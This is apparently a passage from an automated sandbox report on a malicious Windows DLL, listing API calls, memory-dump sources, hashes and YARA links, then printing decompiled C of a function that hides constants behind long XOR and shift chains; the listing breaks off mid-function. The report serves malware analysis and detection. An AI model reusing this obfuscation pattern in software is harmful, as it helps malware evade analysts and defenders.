GetStdHandle.KERNEL32(000000F6), ref: 6ED347A8
GetFileType.KERNELBASE(00000000), ref: 6ED347BA

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: ee31637e6bcaf4bcbb7bfa8367b5732235e5f1e47031acf2b89702f84d784351
Instruction ID: 18864ef2ed58190327625d5aa88b87fc3f30aa32558ae6f01bc9beb8e04c31f7
Opcode Fuzzy Hash: ee31637e6bcaf4bcbb7bfa8367b5732235e5f1e47031acf2b89702f84d784351
Instruction Fuzzy Hash: 4B1106F26047728AD7B08FBE8C946127A94AB47270B34071AD4F6C61F1C33AD083C6C0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2F3B1, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,6ED31E1B,?,?,?,?,00000000,?,00000000,?,?,6ED34EAE,?,6ED34D3D,00000000,?), ref: 6ED31C3F

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 03d9b37ee50f86521fbf84794b5274662f9a48d845ed10d70ef69a9bd13b5f40
Instruction ID: a4a15e6f42fbb18158769681b69f4f472b287813af5c389ced3b72275271be64
Opcode Fuzzy Hash: 03d9b37ee50f86521fbf84794b5274662f9a48d845ed10d70ef69a9bd13b5f40
Instruction Fuzzy Hash: B2E04F61384637A5F95527F15D2ABAA664D1F5771CF340828AB18A80C2EF8AC10A8031

Uniqueness

Uniqueness Score: -1.00%

Function 6ED31C23, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,6ED31E1B,?,?,?,?,00000000,?,00000000,?,?,6ED34EAE,?,6ED34D3D,00000000,?), ref: 6ED31C3F

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: ee056d0a0422107944c38bd01289c28ccfc13214b71429a3f301bc8360e6914e
Instruction ID: 09393aeb669f7af8e86e17135f5487198f28b04be1dd41414d8aea5d0b8326c3
Opcode Fuzzy Hash: ee056d0a0422107944c38bd01289c28ccfc13214b71429a3f301bc8360e6914e
Instruction Fuzzy Hash: 4AE0C27138433BA1F96527E01D1BBE5274D0F57B1CF340828A718AC0C2DF8AC00A8031

Uniqueness

Uniqueness Score: -1.00%

Function 6ED32C26, Relevance: 1.3, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000008,?,?,?,6ED3283F,00000001,00000364,?,FFFFFFFF,000000FF,?,?,6ED2CB0C,?,?,6ED2C074), ref: 6ED32C67

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: a8a1d6b34089741f3e1f99ca92dbeacac008bc882879c01846ed883acc357376
Instruction ID: b7ee5650d3bf2416a9500d8f359f1c15ab47b27fb736b83aa659d327e96cbe18
Opcode Fuzzy Hash: a8a1d6b34089741f3e1f99ca92dbeacac008bc882879c01846ed883acc357376
Instruction Fuzzy Hash: 0EF0B432A05936EAEB555BF68C04B9B37589F43768B308512F814A7184CB32D50182F5

Uniqueness

Uniqueness Score: -1.00%

Function 6ED322E9, Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,?,?,?,6ED2CB0C,?,?,6ED2C074,00000400,FFFDC801,?,?,00000001), ref: 6ED3231B

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 768951aa154b99a1ab89242f50fe11c7ad9d656328ee36ffe583379a9e75403e
Instruction ID: 38d48ad2dd6cfd9e00af5fc35f775bab419f84c2e8ec1b1defa609f5dbd1565a
Opcode Fuzzy Hash: 768951aa154b99a1ab89242f50fe11c7ad9d656328ee36ffe583379a9e75403e
Instruction Fuzzy Hash: 3EE06531A45636DAFA5627E68C0479AB76CAF437E9F310125ED5497184DB20D40181F1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED3228A, Relevance: 1.3, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,6ED30ED2,00000000,6ED6B1B8,0000000C,6ED30E99,?,?,6ED32C59,?,?,6ED3283F,00000001,00000364,?), ref: 6ED32299

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterSection
String ID:
API String ID: 1904992153-0
Opcode ID: 1694610aa8aa98f034f14a389e06dc373d6155ccee4550019ff4df8e77435ba4
Instruction ID: 452cbe8b0676826c360741694d6d9bfef824bc01cd7d626a800bdb3477342ac2
Opcode Fuzzy Hash: 1694610aa8aa98f034f14a389e06dc373d6155ccee4550019ff4df8e77435ba4
Instruction Fuzzy Hash: 48B022B2000208A38F00AAC8CC8E8823B0C80C2222B800020F80C8B220CA30E3288288

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00BC91F7, Relevance: 32.4, Strings: 25, Instructions: 1116
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00BC91F7() {
				signed int _v8;
				char _v32;
				char _v40;
				signed int _v44;
				char _v52;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v88;
				char _v92;
				char _v100;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				unsigned int _v168;
				signed int _v172;
				unsigned int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				unsigned int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				unsigned int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				unsigned int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				unsigned int _v468;
				signed int _v472;
				unsigned int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _t1157;
				signed int _t1161;
				signed int _t1165;
				signed int _t1167;
				signed int _t1197;
				void* _t1204;
				signed int _t1240;
				signed int _t1242;
				signed int _t1243;
				signed int _t1244;
				signed int _t1245;
				signed int _t1246;
				signed int _t1247;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed int _t1251;
				signed int _t1252;
				signed int _t1253;
				signed int _t1254;
				signed int _t1255;
				signed int _t1256;
				signed int _t1257;
				signed int _t1258;
				signed int _t1259;
				signed int _t1260;
				signed int _t1261;
				signed int _t1262;
				signed int _t1263;
				signed int _t1264;
				signed int _t1278;
				signed int _t1349;
				signed int _t1350;
				signed int _t1353;
				signed int _t1369;
				signed int _t1381;
				void* _t1383;
				void* _t1388;
				void* _t1389;
				void* _t1390;

				_t1383 = (_t1381 & 0xfffffff8) - 0x250;
				_v132 = 0x2e436f;
				_v132 = _v132 | 0xf460f017;
				_v132 = _v132 ^ 0xf46ef27d;
				_v196 = 0x7e1c2e;
				_v196 = _v196 ^ 0x6e4e5938;
				_v196 = _v196 ^ 0x6e304516;
				_v244 = 0x3317d;
				_v244 = _v244 >> 1;
				_v244 = _v244 ^ 0x000198be;
				_v544 = 0x71e6e4;
				_v544 = _v544 ^ 0x19d035bd;
				_v544 = _v544 ^ 0xde3e36e6;
				_v544 = _v544 ^ 0xd4549da3;
				_v544 = _v544 ^ 0x13ca6661;
				_v252 = 0x207f28;
				_v252 = _v252 ^ 0x96f23610;
				_v252 = _v252 ^ 0x96d56cb8;
				_v284 = 0xb4eb71;
				_v284 = _v284 | 0x642f1f72;
				_v284 = _v284 ^ 0x64bf3882;
				_v300 = 0x36db85;
				_v300 = _v300 | 0x0bc6f940;
				_v300 = _v300 + 0x9fae;
				_v300 = _v300 ^ 0x0bfad767;
				_v208 = 0xa45bd2;
				_v208 = _v208 << 8;
				_v208 = _v208 ^ 0xa452a46b;
				_v336 = 0x6cd8ed;
				_v336 = _v336 * 0x36;
				_t1353 = 0xaa07b46;
				_t1349 = 0x36;
				_v336 = _v336 / _t1349;
				_v336 = _v336 ^ 0x006d1188;
				_v524 = 0xd565be;
				_t1242 = 0x7c;
				_v524 = _v524 / _t1242;
				_v524 = _v524 + 0xd960;
				_v524 = _v524 << 5;
				_v524 = _v524 ^ 0x00539a7f;
				_v528 = 0xe16fa2;
				_v528 = _v528 << 3;
				_v528 = _v528 + 0x4317;
				_v528 = _v528 + 0x3040;
				_v528 = _v528 ^ 0x0704c1ec;
				_v372 = 0x8fac1c;
				_v372 = _v372 ^ 0x1e276069;
				_v372 = _v372 * 0x3f;
				_v372 = _v372 ^ 0x8b8c4a83;
				_v272 = 0x48fc0a;
				_v272 = _v272 << 4;
				_v272 = _v272 ^ 0x048c9edd;
				_v516 = 0x93770a;
				_v516 = _v516 >> 9;
				_v516 = _v516 | 0x4252a838;
				_v516 = _v516 + 0x705d;
				_v516 = _v516 ^ 0x4251f9f6;
				_v512 = 0x41b3f;
				_v512 = _v512 >> 7;
				_v512 = _v512 | 0x35af6ec2;
				_v512 = _v512 * 0x53;
				_v512 = _v512 ^ 0x67eb8694;
				_v212 = 0xb915;
				_v212 = _v212 ^ 0x948b0e88;
				_v212 = _v212 ^ 0x9486ad8a;
				_v356 = 0x63bb5f;
				_v356 = _v356 ^ 0x436200ea;
				_t1243 = 0x7e;
				_v356 = _v356 * 0x76;
				_v356 = _v356 ^ 0xe2c785b3;
				_v324 = 0x6c06d7;
				_v324 = _v324 >> 0xa;
				_v324 = _v324 / _t1243;
				_v324 = _v324 ^ 0x000b64e8;
				_v308 = 0xca3f81;
				_v308 = _v308 >> 2;
				_v308 = _v308 >> 0xc;
				_v308 = _v308 ^ 0x00092fdc;
				_v360 = 0xbfd72b;
				_v360 = _v360 ^ 0xff3a0c39;
				_v360 = _v360 << 9;
				_v360 = _v360 ^ 0x0bb3b832;
				_v240 = 0x9d6f80;
				_v240 = _v240 / _t1349;
				_v240 = _v240 ^ 0x000c7437;
				_v588 = 0x113401;
				_t1244 = 0x61;
				_v588 = _v588 * 0x24;
				_v588 = _v588 / _t1244;
				_v588 = _v588 ^ 0x0003e589;
				_v384 = 0x4b8860;
				_v384 = _v384 << 0xf;
				_v384 = _v384 << 1;
				_v384 = _v384 ^ 0x8868048a;
				_v264 = 0x29020a;
				_t1245 = 0x11;
				_v264 = _v264 * 0x21;
				_v264 = _v264 ^ 0x0542f97f;
				_v468 = 0xb6b72b;
				_v468 = _v468 + 0xffff5632;
				_v468 = _v468 >> 0xb;
				_v468 = _v468 + 0x2f7e;
				_v468 = _v468 ^ 0x00028262;
				_v460 = 0x54f239;
				_v460 = _v460 << 6;
				_v460 = _v460 + 0xfffffbb9;
				_v460 = _v460 ^ 0x82d4ff03;
				_v460 = _v460 ^ 0x97e5d5b5;
				_v140 = 0x985261;
				_v140 = _v140 + 0xffff0c59;
				_v140 = _v140 ^ 0x00972a82;
				_v500 = 0x518a2c;
				_v500 = _v500 / _t1245;
				_v500 = _v500 + 0x702a;
				_v500 = _v500 << 0xd;
				_v500 = _v500 ^ 0xa785771e;
				_v368 = 0x521baf;
				_v368 = _v368 * 0x25;
				_v368 = _v368 | 0x64d0e33c;
				_v368 = _v368 ^ 0x6fdd3e6d;
				_v436 = 0x35d7cb;
				_v436 = _v436 * 0x6d;
				_v436 = _v436 | 0xabb542e6;
				_v436 = _v436 + 0xd249;
				_v436 = _v436 ^ 0xbff7fb1b;
				_v292 = 0xcdcade;
				_v292 = _v292 | 0x43b684fa;
				_v292 = _v292 ^ 0x43f66b05;
				_v160 = 0x58e408;
				_v160 = _v160 | 0x368c4477;
				_v160 = _v160 ^ 0x36d34ac8;
				_v304 = 0x7c84d1;
				_t1246 = 0x47;
				_v304 = _v304 / _t1246;
				_v304 = _v304 + 0xffff9796;
				_v304 = _v304 ^ 0x000bb16e;
				_v216 = 0xc36bed;
				_v216 = _v216 + 0xd97;
				_v216 = _v216 ^ 0x00c2e969;
				_v476 = 0xa7b7c7;
				_v476 = _v476 << 6;
				_v476 = _v476 + 0x6c6c;
				_v476 = _v476 >> 5;
				_v476 = _v476 ^ 0x0140bd2d;
				_v520 = 0xf3ea92;
				_v520 = _v520 + 0xffff847d;
				_t1247 = 0x3c;
				_v520 = _v520 * 0x69;
				_v520 = _v520 / _t1247;
				_v520 = _v520 ^ 0x01a2bdb3;
				_v440 = 0x637ee1;
				_v440 = _v440 + 0xffff9b2b;
				_v440 = _v440 ^ 0xed5600a5;
				_v440 = _v440 + 0xbbcd;
				_v440 = _v440 ^ 0xed38855c;
				_v316 = 0xd359ff;
				_t1248 = 0x12;
				_v316 = _v316 / _t1248;
				_t1249 = 0x2c;
				_v316 = _v316 / _t1249;
				_v316 = _v316 ^ 0x000bd707;
				_v404 = 0xe9d10;
				_v404 = _v404 + 0x8531;
				_v404 = _v404 << 7;
				_v404 = _v404 ^ 0x0799698e;
				_v568 = 0x4b0a43;
				_t313 =  &_v568; // 0x4b0a43
				_t1250 = 0x2f;
				_v568 =  *_t313 * 0x38;
				_v568 = _v568 + 0xffffdc5e;
				_v568 = _v568 ^ 0x149a11d4;
				_v568 = _v568 ^ 0x04f7f7c0;
				_v268 = 0xc0e06b;
				_v268 = _v268 / _t1250;
				_v268 = _v268 ^ 0x000b86b0;
				_v496 = 0xf422ea;
				_v496 = _v496 + 0xfffff2eb;
				_v496 = _v496 >> 7;
				_v496 = _v496 + 0xa1f8;
				_v496 = _v496 ^ 0x0008b42f;
				_v188 = 0x553f6c;
				_v188 = _v188 | 0x678376e9;
				_v188 = _v188 ^ 0x67d882bd;
				_v396 = 0x923886;
				_t1251 = 5;
				_v396 = _v396 / _t1251;
				_v396 = _v396 + 0x9c46;
				_v396 = _v396 ^ 0x00120a3e;
				_v560 = 0x9fec96;
				_v560 = _v560 | 0x622a8444;
				_v560 = _v560 ^ 0x99c5ba67;
				_v560 = _v560 >> 0xd;
				_v560 = _v560 ^ 0x0000fc9d;
				_v128 = 0xf88125;
				_v128 = _v128 << 0x10;
				_v128 = _v128 ^ 0x812bf008;
				_v552 = 0xcb4f6a;
				_v552 = _v552 / _t1349;
				_v552 = _v552 + 0xffff6d2e;
				_v552 = _v552 | 0x89619965;
				_v552 = _v552 ^ 0x8962c3cc;
				_v432 = 0xf978ba;
				_v432 = _v432 + 0xffffa816;
				_v432 = _v432 ^ 0x2094ddcc;
				_v432 = _v432 >> 0xa;
				_v432 = _v432 ^ 0x0007c0c7;
				_v488 = 0xcf9f95;
				_v488 = _v488 ^ 0xbf36e5e7;
				_t1252 = 0x58;
				_v488 = _v488 * 0x2a;
				_v488 = _v488 + 0xffff2176;
				_v488 = _v488 ^ 0x7ee684ba;
				_v388 = 0x12fb7d;
				_v388 = _v388 * 0x4d;
				_v388 = _v388 >> 3;
				_v388 = _v388 ^ 0x00bf9b98;
				_v340 = 0x796913;
				_v340 = _v340 + 0xac69;
				_v340 = _v340 * 0x61;
				_v340 = _v340 ^ 0x2e401a56;
				_v328 = 0x91b64e;
				_v328 = _v328 / _t1252;
				_v328 = _v328 ^ 0x35ed1920;
				_v328 = _v328 ^ 0x35e14498;
				_v320 = 0xcfff90;
				_v320 = _v320 + 0x6092;
				_v320 = _v320 + 0xffff7281;
				_v320 = _v320 ^ 0x00c5b6f7;
				_v452 = 0xef9f32;
				_v452 = _v452 | 0xbd38e664;
				_v452 = _v452 + 0xf2b8;
				_v452 = _v452 | 0x10bd091b;
				_v452 = _v452 ^ 0xbeb9595a;
				_v192 = 0x21f349;
				_t1253 = 0x54;
				_v192 = _v192 / _t1253;
				_v192 = _v192 ^ 0x000688f1;
				_v200 = 0xc0b775;
				_v200 = _v200 << 0xb;
				_v200 = _v200 ^ 0x05bf80fb;
				_v376 = 0x690522;
				_v376 = _v376 + 0xffffeeed;
				_v376 = _v376 ^ 0x86395638;
				_v376 = _v376 ^ 0x865332bb;
				_v248 = 0x6656fd;
				_v248 = _v248 | 0x17cebcd9;
				_v248 = _v248 ^ 0x17e231ad;
				_v256 = 0x5a882f;
				_v256 = _v256 + 0xffff43e8;
				_v256 = _v256 ^ 0x005beeea;
				_v176 = 0x5696cd;
				_v176 = _v176 >> 0xb;
				_v176 = _v176 ^ 0x000c4c16;
				_v456 = 0xda330b;
				_v456 = _v456 + 0xffff846d;
				_v456 = _v456 + 0x61bd;
				_v456 = _v456 | 0x00ba29dc;
				_v456 = _v456 ^ 0x00ff632b;
				_v380 = 0xd1e147;
				_v380 = _v380 >> 6;
				_v380 = _v380 << 0xd;
				_v380 = _v380 ^ 0x68f0e02b;
				_v180 = 0x3ff1d9;
				_t1254 = 0x33;
				_v180 = _v180 / _t1254;
				_v180 = _v180 ^ 0x00023228;
				_v344 = 0xf4edb4;
				_v344 = _v344 << 0xd;
				_v344 = _v344 | 0x97e14590;
				_v344 = _v344 ^ 0x9ff7325a;
				_v484 = 0x6c4a81;
				_v484 = _v484 | 0xfdca8d1b;
				_v484 = _v484 >> 0x10;
				_v484 = _v484 << 0xf;
				_v484 = _v484 ^ 0x7effa9ca;
				_v596 = 0xdabff7;
				_v596 = _v596 + 0x73c4;
				_v596 = _v596 << 7;
				_v596 = _v596 | 0xfa5794d9;
				_v596 = _v596 ^ 0xffd249eb;
				_v424 = 0x540103;
				_v424 = _v424 ^ 0xa382819c;
				_v424 = _v424 | 0xb091fb68;
				_v424 = _v424 ^ 0xb3d56d76;
				_v156 = 0x8c7fe9;
				_v156 = _v156 + 0xffff3974;
				_v156 = _v156 ^ 0x008ef74c;
				_v420 = 0xfd2cd1;
				_v420 = _v420 >> 0xc;
				_v420 = _v420 ^ 0xe3610dc2;
				_v420 = _v420 ^ 0xe3634cc2;
				_v504 = 0xf0e4f4;
				_v504 = _v504 + 0xb6ec;
				_v504 = _v504 ^ 0x32429e81;
				_v504 = _v504 + 0xadf2;
				_v504 = _v504 ^ 0x32bc4899;
				_v276 = 0x5de68b;
				_v276 = _v276 + 0x1902;
				_v276 = _v276 ^ 0x005cfb2b;
				_v464 = 0x5cdad0;
				_v464 = _v464 << 2;
				_v464 = _v464 + 0x27c3;
				_v464 = _v464 ^ 0xfe85190a;
				_v464 = _v464 ^ 0xfff0056f;
				_v576 = 0x5bf2e0;
				_v576 = _v576 << 9;
				_v576 = _v576 + 0x6474;
				_v576 = _v576 << 6;
				_v576 = _v576 ^ 0xf98a1109;
				_v260 = 0xe6f5fe;
				_t1255 = 0x45;
				_v260 = _v260 / _t1255;
				_v260 = _v260 ^ 0x0003b47a;
				_v416 = 0x364d66;
				_v416 = _v416 << 9;
				_v416 = _v416 ^ 0x871fcbcc;
				_v416 = _v416 ^ 0xeb871ae9;
				_v152 = 0xded983;
				_v152 = _v152 + 0x4b0f;
				_v152 = _v152 ^ 0x00df80d2;
				_v448 = 0xc5cd59;
				_v448 = _v448 + 0xffff44a9;
				_v448 = _v448 | 0xe64c83cc;
				_t1256 = 0x74;
				_v448 = _v448 / _t1256;
				_v448 = _v448 ^ 0x01f904de;
				_v592 = 0x675892;
				_v592 = _v592 | 0xbe4f77c4;
				_v592 = _v592 + 0xffffac99;
				_v592 = _v592 ^ 0xb6dae313;
				_v592 = _v592 ^ 0x08b8aa9c;
				_v288 = 0xc30099;
				_v288 = _v288 >> 0x10;
				_v288 = _v288 + 0xe193;
				_v288 = _v288 ^ 0x000c0ea3;
				_v136 = 0xcb6e43;
				_v136 = _v136 ^ 0xb95a6532;
				_v136 = _v136 ^ 0xb99574cc;
				_v204 = 0xfd67d3;
				_v204 = _v204 + 0xbcdb;
				_v204 = _v204 ^ 0x00f4c5c9;
				_v564 = 0x58b287;
				_t1257 = 0x19;
				_v564 = _v564 * 0x70;
				_v564 = _v564 + 0x3be8;
				_v564 = _v564 * 0x25;
				_v564 = _v564 ^ 0x9bd3e329;
				_v148 = 0x1d248b;
				_v148 = _v148 + 0x6f6a;
				_v148 = _v148 ^ 0x00153086;
				_v572 = 0xf52f4c;
				_v572 = _v572 / _t1257;
				_v572 = _v572 + 0xab35;
				_t1258 = 0xc;
				_v572 = _v572 / _t1258;
				_v572 = _v572 ^ 0x00067d12;
				_v580 = 0xf5bae7;
				_v580 = _v580 | 0x5cf7bfbf;
				_v580 = _v580 * 0x7e;
				_v580 = _v580 ^ 0xc1ff09fa;
				_v408 = 0x6a02f0;
				_v408 = _v408 + 0xffff43b7;
				_v408 = _v408 >> 7;
				_v408 = _v408 ^ 0x000eaeb8;
				_v532 = 0xe5ed81;
				_v532 = _v532 >> 0x10;
				_v532 = _v532 >> 8;
				_v532 = _v532 ^ 0x299daec3;
				_v532 = _v532 ^ 0x299c8334;
				_v540 = 0x73bd6d;
				_v540 = _v540 + 0x3999;
				_v540 = _v540 ^ 0x4d3fe297;
				_v540 = _v540 + 0xbeb4;
				_v540 = _v540 ^ 0x4d4b6113;
				_v280 = 0xf78be9;
				_v280 = _v280 + 0xffff2e4a;
				_v280 = _v280 ^ 0x00f6eff7;
				_v168 = 0x4a6296;
				_v168 = _v168 >> 8;
				_v168 = _v168 ^ 0x0006c563;
				_v444 = 0x52befb;
				_v444 = _v444 | 0xfb460347;
				_v444 = _v444 * 0x57;
				_v444 = _v444 << 8;
				_v444 = _v444 ^ 0x7b329ced;
				_v364 = 0x8bf6d0;
				_t1259 = 0x49;
				_v364 = _v364 / _t1259;
				_v364 = _v364 | 0xd55b2da9;
				_v364 = _v364 ^ 0xd551e475;
				_v472 = 0x18acd0;
				_v472 = _v472 + 0xffff7fc7;
				_v472 = _v472 + 0xffff0e44;
				_v472 = _v472 + 0xffff0bff;
				_v472 = _v472 ^ 0x001d017a;
				_v144 = 0x4fd139;
				_v144 = _v144 ^ 0x0d7608f8;
				_v144 = _v144 ^ 0x0d3e01c7;
				_v220 = 0xa1d89d;
				_v220 = _v220 + 0x68ba;
				_v220 = _v220 ^ 0x00a8b60a;
				_v224 = 0xd8ad63;
				_t1260 = 0x39;
				_v224 = _v224 * 0xd;
				_v224 = _v224 ^ 0x0b05e067;
				_v232 = 0x1dd59e;
				_v232 = _v232 + 0xffffb984;
				_v232 = _v232 ^ 0x0014d7c8;
				_v492 = 0x8ee343;
				_v492 = _v492 + 0xfffffdd7;
				_v492 = _v492 * 0x50;
				_v492 = _v492 + 0xffff20fb;
				_v492 = _v492 ^ 0x2ca84503;
				_v352 = 0xb8f26f;
				_v352 = _v352 + 0x7ba8;
				_v352 = _v352 >> 6;
				_v352 = _v352 ^ 0x000b39f4;
				_v536 = 0x43cba6;
				_v536 = _v536 + 0xffff968b;
				_v536 = _v536 + 0xd20d;
				_v536 = _v536 << 1;
				_v536 = _v536 ^ 0x00836c5a;
				_v480 = 0x5e5d26;
				_v480 = _v480 + 0xffff687f;
				_v480 = _v480 ^ 0xddceb38b;
				_v480 = _v480 | 0x4dfd19e7;
				_v480 = _v480 ^ 0xddf7d232;
				_v236 = 0x7bb6bb;
				_v236 = _v236 << 0xa;
				_v236 = _v236 ^ 0xeeda4ae1;
				_v332 = 0xdbd532;
				_v332 = _v332 / _t1260;
				_v332 = _v332 + 0x6f41;
				_v332 = _v332 ^ 0x000f8c93;
				_v172 = 0x169d2;
				_v172 = _v172 << 1;
				_v172 = _v172 ^ 0x000bb064;
				_v228 = 0xc8a619;
				_t1261 = 0x51;
				_v228 = _v228 / _t1261;
				_v228 = _v228 ^ 0x000b224e;
				_v296 = 0xf4bcd8;
				_v296 = _v296 + 0xffffb281;
				_v296 = _v296 + 0xffff612f;
				_v296 = _v296 ^ 0x00ff5067;
				_v428 = 0x3c482c;
				_t832 =  &_v428; // 0x3c482c
				_v428 =  *_t832 * 0x2f;
				_v428 = _v428 + 0xffff6f9d;
				_v428 = _v428 | 0x8da675c7;
				_v428 = _v428 ^ 0x8fb5367e;
				_v164 = 0x73eaaf;
				_t1262 = 0x7b;
				_v164 = _v164 / _t1262;
				_v164 = _v164 ^ 0x013494eb;
				_v508 = 0xaea7a7;
				_v508 = _v508 + 0xffffad05;
				_v508 = _v508 | 0x2fb01782;
				_v508 = _v508 + 0xdf59;
				_v508 = _v508 ^ 0x2fbf1017;
				_v348 = 0x6a0001;
				_v348 = _v348 >> 8;
				_t1263 = 0x1e;
				_t1350 = _v292;
				_t1240 = _v292;
				_v348 = _v348 * 0x56;
				_v348 = _v348 ^ 0x00239c01;
				_v312 = 0x718fb1;
				_v312 = _v312 ^ 0x0a0922bb;
				_v312 = _v312 + 0xffff9da2;
				_v312 = _v312 ^ 0x0a78450c;
				_v184 = 0xbc43da;
				_v184 = _v184 | 0x65dbfe97;
				_v184 = _v184 ^ 0x65ffe09f;
				_v584 = 0x19ebc;
				_v584 = _v584 << 0xd;
				_v584 = _v584 * 0x6e;
				_v584 = _v584 | 0x20e1f71e;
				_v584 = _v584 ^ 0x66f44cbe;
				_v556 = 0x102963;
				_v556 = _v556 << 1;
				_v556 = _v556 + 0xffff27ea;
				_v556 = _v556 >> 8;
				_v556 = _v556 ^ 0x000da4da;
				_v412 = 0x8d39f9;
				_v412 = _v412 ^ 0x304d710d;
				_v412 = _v412 + 0x1676;
				_v412 = _v412 ^ 0x30ceab4a;
				_v548 = 0xb36dd5;
